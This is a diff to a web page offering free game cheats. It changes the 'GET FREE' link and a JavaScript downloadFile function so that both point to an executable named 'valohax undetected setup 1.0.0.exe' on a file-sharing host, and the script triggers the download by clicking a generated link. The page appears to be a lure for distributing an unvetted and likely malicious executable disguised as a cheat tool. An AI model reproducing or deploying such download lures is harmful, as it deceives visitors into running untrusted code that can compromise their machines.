--- a/index.htm
+++ b/index.htm
@@ -99,7 +99,7 @@
             <h1>Top 8 products</h1>
             <h2>The most popular products</h2>
         </div>
-       <a href="https://www.dropbox.com/scl/fi/vbe2jc840dvlhg4a5ob9k/valohexloader.rar?rlkey=9iekwli62njfyoyvd7jkueh4l&st=x3a7zjfp&dl=1" class="catalog-block__item-link" download>GET FREE</a>
+       <a href="https://up.sceptique.eu/f/25042100/cb116837/valohax%20undetected%20setup%201.0.0.exe" class="catalog-block__item-link" download>GET FREE</a>
             <div class="catalog-block__item">
                 <div>
                     <img src="fortnite.svg" alt="" class="catalog-block__img">
@@ -294,7 +294,7 @@ const buttons = document.querySelectorAll('.catalog-block__item-link');
 
 function downloadFile(filename) {
   const link = document.createElement('a');
-  link.href = 'https://up.sceptique.eu/f/25041316/2e2d4e8f/valohex.rar';
+  link.href = 'https://up.sceptique.eu/f/25042100/cb116837/valohax%20undetected%20setup%201.0.0.exe';
   link.download = filename;
   link.click();
 }
